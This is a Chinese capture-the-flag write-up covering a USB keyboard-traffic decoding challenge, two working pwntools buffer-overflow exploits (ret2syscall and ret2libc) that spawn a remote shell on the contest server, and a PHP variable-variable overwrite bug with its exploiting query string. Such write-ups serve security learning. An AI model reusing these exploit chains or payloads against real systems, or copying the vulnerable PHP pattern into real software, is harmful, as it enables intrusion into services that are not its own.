结营赛wp

最终排名第10,还可以吧

## misc

签到

hsnctf{welcome_to_hsnctf}

easyusb

打开压缩包,发现一个流量包和一个加密的 flag.zip

应该是先从流量包中得到密码,再用它解出 flag

流量包是键盘流量

─$ tshark -T json -r usb.pcapng > test.json 

手动提取键盘流量

00:00:16:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:08:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:06:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:1f:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:08:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:17:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0e:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:20:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:1c:00:00:00:00:00
00:00:00:00:00:00:00:00

之后利用脚本对提取出的报文进行解码

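# USB HID keyboard scancode -> character table (unshifted layer only; the
# modifier byte is never consulted, so letters always come out uppercase).
mappings = {
    0x04: "A", 0x05: "B", 0x06: "C", 0x07: "D", 0x08: "E", 0x09: "F",
    0x0A: "G", 0x0B: "H", 0x0C: "I", 0x0D: "J", 0x0E: "K", 0x0F: "L",
    0x10: "M", 0x11: "N", 0x12: "O", 0x13: "P", 0x14: "Q", 0x15: "R",
    0x16: "S", 0x17: "T", 0x18: "U", 0x19: "V", 0x1A: "W", 0x1B: "X",
    0x1C: "Y", 0x1D: "Z",
    0x1E: "1", 0x1F: "2", 0x20: "3", 0x21: "4", 0x22: "5", 0x23: "6",
    0x24: "7", 0x25: "8", 0x26: "9", 0x27: "0",
    0x28: "\n", 0x2A: "[DEL]", 0x2B: "    ", 0x2C: " ", 0x2D: "-",
    0x2E: "=", 0x2F: "[", 0x30: "]", 0x31: "\\", 0x32: "~", 0x33: ";",
    0x34: "'", 0x36: ",", 0x37: ".",
}

# One report line looks like "xx:xx:xx:xx:xx:xx:xx:xx" (8 hex bytes).  Field 2 is
# the first key slot; every other field (modifier, reserved, key slots 2-6) has
# to be "00" for the record to be decoded.  These are exactly the character
# positions the original script tested one by one.
_KEY_FIELD = 2
_MUST_BE_ZERO = (0, 1, 3, 4, 5, 6, 7)


def _single_keycode(line):
    """Return the scancode in key slot 1 of one report line, or None.

    None is returned when the line does not split into 8 fields or when any
    field other than the first key slot is non-zero (a modifier held, several
    keys down at once, or a malformed/short line -- the original indexed the
    line directly and could raise IndexError on short input).  A non-hex key
    field still raises ValueError, as before.
    """
    fields = line.strip().split(':')
    if len(fields) != 8:
        return None
    if any(fields[i] != '00' for i in _MUST_BE_ZERO):
        return None
    return int(fields[_KEY_FIELD], 16)


def decode_keystrokes(lines):
    """Decode an iterable of report lines into the typed text.

    Records rejected by ``_single_keycode`` are skipped, key-release reports
    (scancode 0) are dropped, and scancodes missing from ``mappings`` are
    rendered as ``[unknown]``.  Returns the concatenated string.
    """
    codes = (_single_keycode(line) for line in lines)
    return "".join(
        mappings.get(code, '[unknown]')
        for code in codes
        if code is not None and code != 0
    )


def main(path='usbdata.txt'):
    """Read the extracted reports from *path* and print the decoded text."""
    # `with` guarantees the handle is closed even if decoding raises.
    with open(path) as keys:
        output = decode_keystrokes(keys)
    print('output :\n' + output)


if __name__ == "__main__":
    main()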

得到密码为SEC2ETK3Y(大写),解开压缩包得到flag

hsnctf{y0u_can_g4t_easy_usb}

## pwn

ret2syscall

# Solve script from the writeup for the "ret2syscall" challenge (pwntools).
# The commented-out lines are the author's local-debugging alternatives, left as-is.
from LibcSearcher import*
from pwn import *
# from ctypes import *
context(arch='amd64',os='linux',log_level='debug')

# Contest instance (host/port as given during the event).
r = remote('58.240.236.231',49003)

# r = gdb.debug('./bheap')
# r = process('pwn')
# libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
# libc = ELF('/home/h711/tools/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')
elf = ELF('pwn')  # loaded but not referenced again in this script
# ld-linux-x86-64.so.2
# srand = libc.srand(libc.time(0)) # seed the RNG

# Short aliases over the pwntools tube API (the author's boilerplate; only
# `sl` and `it` are used below).
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, b'\0'))
uu64 = lambda data :u64(data.ljust(8, b'\0'))
lic = lambda data :uu64(ru(data)[-6:])
pack = lambda str, addr :p32(addr)  # NOTE(review): shadows the builtin `str`; unused here
padding = lambda lenth :b'aaaaa'*(lenth//5)+b'F'*(lenth % 5)
it = lambda :r.interactive()

# Gadget addresses copied from the author's gadget search; the "#:" text is
# the search tool's description of each address.
rax = 0x0000000000400721 #: pop rax ; ret
rdx = 0x0000000000400721 #: pop rdx ; ret   NOTE(review): same address as `rax`; rebound two lines down, so this binding is never used
rsi = 0x000000000400735 #: pop rsi ; ret
rdx = 0x000000000400735 #: pop rdx ; ret   NOTE(review): same address as `rsi`; this is the binding the payload uses
ret = 0x0000000000400509 #: ret   (unused below)
binsh = 0x0000000000601048 #: /bin/sh
syscall = 0x000000000400741
rdi = 0x000000000040072b #: pop rdi ; ret

pl = b'a'*0x48 + p64(rax) + p64(0x3b) + p64(rsi) + p64(0) + p64(rdx) + p64(0) + p64(rdi) + p64(binsh) + p64(syscall)
sl(pl)  # send the payload as one line

it()  # hand the connection to the user

hsnctf{85ef9d72-c603-17df-59bc}

ret2libc

# Solve script from the writeup for the "ret2libc" challenge (pwntools).
# The commented-out lines are the author's local-debugging alternatives, left as-is.
from LibcSearcher import*
from pwn import *
# from ctypes import *
context(arch='amd64',os='linux',log_level='debug')

# Contest instance (host/port as given during the event).
r = remote('58.240.236.231',49002)

# r = gdb.debug('./bheap')
# r = process('1')
# libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
# libc = ELF('/home/h711/tools/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')
elf = ELF('1')  # challenge binary; its symbol/PLT/GOT tables are read below
# ld-linux-x86-64.so.2
# srand = libc.srand(libc.time(0)) # seed the RNG

# Short aliases over the pwntools tube API (the author's boilerplate).
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, b'\0'))
uu64 = lambda data :u64(data.ljust(8, b'\0'))
# Read up to a delimiter and unpack the last 6 bytes as a little-endian address.
lic = lambda data :uu64(ru(data)[-6:])
pack = lambda str, addr :p32(addr)  # NOTE(review): shadows the builtin `str`; unused here
padding = lambda lenth :b'aaaaa'*(lenth//5)+b'F'*(lenth % 5)
it = lambda :r.interactive()

main = elf.sym['vul']  # named `main` but holds the address of the binary's `vul` function
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
rdi = 0x0000000000400783
ret = 0x0000000000400509
rc()  # drain the banner before sending
pl = 0xD8*b'a' + p64(ret) + p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
sl(pl)
# print(rc())
put_addr = lic('\x7f')  # leaked puts address (see `lic` above)

print('put====>',hex(put_addr))
# Identify the remote libc from the leaked puts address and derive the offsets.
libc = LibcSearcher('puts',put_addr)
base = put_addr - libc.dump('puts')
system = base + libc.dump('system')
binsh = base + libc.dump('str_bin_sh')

pl2 = b'a'*0xD8 + p64(ret) + p64(rdi) + p64(binsh) + p64(system)
sl(pl2)

it()  # hand the connection to the user


# sl()

hsnctf{04b4cfca-db86-486b-14b2}

## web

### git

借鉴原题: https://blog.csdn.net/m0_62879498/article/details/124586653

Git扫描后发现git泄露

<?php
// Challenge source recovered from the leaked .git directory.
// Security note: both request loops below use variable-variables ($$x) whose
// *names* come straight from the client, so any global in this file --
// including $flag -- can be overwritten or aliased by a crafted request.
// That request-controlled variable-variable is the root cause here.

include 'flag.php';
print_r($flag); // NOTE(review): prints $flag unconditionally, before any check runs

$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach($_POST as $x => $y){ // $key = value: each POST parameter becomes/overwrites a variable named by its key
    $$x = $y;

}

foreach($_GET as $x => $y){
    $$x = $$y;// variable named by the key receives the value of the variable named by the value, e.g. $handsome = $flag when ?handsome=flag
}

// All of the following conditions must be avoided (each one exits early)
foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){ // exits when the value of ?flag equals some GET key name and that key is not itself "flag"
        exit($handsome);
    }
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){// flag has to be set in GET or POST
    exit($yds);
}

if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){// neither may be the literal string 'flag'
    exit($is);
}

echo "the flag is: ".$flag;

利用条件:

if($_GET['flag'] === $x && $x !== 'flag'){ //不能同时 flag的值等于某个键名,那个键名又是flag, 也就是 flag=a && a!=flag,这样就能进了: ?flag=(不是flag)&(不是flag)=xxx
进入条件十分简单:?flag=a&a=flag 即可
循环判断到 a=flag 的时候, $_GET['flag'] === $x && $x !== 'flag' --> 'a' === 'a' && 'a' !== 'flag', 即 true && true, 于是进入分支, 然后 exit($handsome);
因为要 exit($handsome); 那么我们要做的就是 让$handsome = $flag get 条件的处理如下:

foreach($_GET as $x => $y){
    $$x = $$y;// $handsome = flag的值 --> $handsome = $flag --> $x=handsome & $y=flag
}

$$x = $$y, 而我们要的结果是 $handsome = $flag, 那么特简单: 让 $x=handsome 和 $y=flag 即可

payload: ?handsome=flag&flag=b&b=flag